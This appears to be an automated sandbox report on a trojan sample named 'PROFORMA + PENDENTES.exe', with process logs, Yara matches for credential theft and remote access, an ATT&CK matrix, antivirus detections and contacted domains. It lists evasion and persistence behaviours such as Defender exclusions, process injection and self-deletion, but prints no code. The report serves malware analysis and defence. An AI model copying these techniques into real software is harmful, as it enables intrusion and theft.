              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeQueries volume information: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeQueries volume information: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Speech\v4.0_4.0.0.0__31bf3856ad364e35\System.Speech.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeQueries volume information: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.1691929548.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: WYqxTmjfOgdZ.exe PID: 5420, type: MEMORYSTR
              Source: Yara matchFile source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.1691929548.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: WYqxTmjfOgdZ.exe PID: 5420, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              111
              Process Injection
              1
              Masquerading
              OS Credential Dumping11
              Security Software Discovery
              Remote Services11
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading
              1
              Scheduled Task/Job
              11
              Disable or Modify Tools
              LSASS Memory1
              Process Discovery
              Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              31
              Virtualization/Sandbox Evasion
              Security Account Manager31
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
              Process Injection
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture13
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets1
              System Network Configuration Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
              Obfuscated Files or Information
              Cached Domain Credentials1
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing
              DCSync12
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              File Deletion
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557908 Sample: PROFORMA + PENDENTES.exe Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 59 reallyfreegeoip.org 2->59 61 18.31.95.13.in-addr.arpa 2->61 63 2 other IPs or domains 2->63 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 Antivirus / Scanner detection for submitted sample 2->77 81 12 other signatures 2->81 9 PROFORMA + PENDENTES.exe 7 2->9         started        13 WYqxTmjfOgdZ.exe 5 2->13         started        signatures3 79 Tries to detect the country of the analysis system (by using the IP) 59->79 process4 file5 51 C:\Users\user\AppData\...\WYqxTmjfOgdZ.exe, PE32 9->51 dropped 53 C:\Users\...\WYqxTmjfOgdZ.exe:Zone.Identifier, ASCII 9->53 dropped 55 C:\Users\user\AppData\Local\...\tmp3E72.tmp, XML 9->55 dropped 57 C:\Users\...\PROFORMA + PENDENTES.exe.log, ASCII 9->57 dropped 83 Adds a directory exclusion to Windows Defender 9->83 85 Injects a PE file into a foreign processes 9->85 15 PROFORMA + PENDENTES.exe 15 3 9->15         started        19 powershell.exe 23 9->19         started        21 powershell.exe 23 9->21         started        27 3 other processes 9->27 87 Antivirus detection for dropped file 13->87 89 Multi AV Scanner detection for dropped file 13->89 91 Machine Learning detection for dropped file 13->91 23 WYqxTmjfOgdZ.exe 13->23         started        25 schtasks.exe 13->25         started        signatures6 process7 dnsIp8 65 checkip.dyndns.com 158.101.44.242, 49709, 49713, 49715 ORACLE-BMC-31898US United States 15->65 67 reallyfreegeoip.org 188.114.97.3, 443, 49711, 49712 CLOUDFLARENETUS European Union 15->67 69 Self deletion via cmd or bat file 15->69 29 cmd.exe 15->29         started        71 Loading BitLocker PowerShell Module 19->71 31 conhost.exe 19->31         started        33 WmiPrvSE.exe 19->33         started        35 conhost.exe 21->35         started        37 cmd.exe 23->37         started        39 conhost.exe 25->39         started        41 conhost.exe 27->41         started        signatures9 process10 process11 43 conhost.exe 29->43         started        45 choice.exe 29->45         started        47 conhost.exe 37->47         started        49 choice.exe 37->49         started       

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              PROFORMA + PENDENTES.exe32%ReversingLabsWin32.Trojan.Generic
              PROFORMA + PENDENTES.exe100%AviraHEUR/AGEN.1305624
              PROFORMA + PENDENTES.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe100%AviraHEUR/AGEN.1305624
              C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe32%ReversingLabsWin32.Trojan.Generic
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://crl.mv0%Avira URL Cloudsafe
              http://checkip.dyndns.orgH0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
              188.114.97.3
              truefalse
                high
                checkip.dyndns.com
                158.101.44.242
                truefalse
                  high
                  18.31.95.13.in-addr.arpa
                  unknown
                  unknowntrue
                    unknown
                    checkip.dyndns.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                        high
                        https://reallyfreegeoip.org/xml/155.94.241.187false
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://checkip.dyndns.orgHWYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
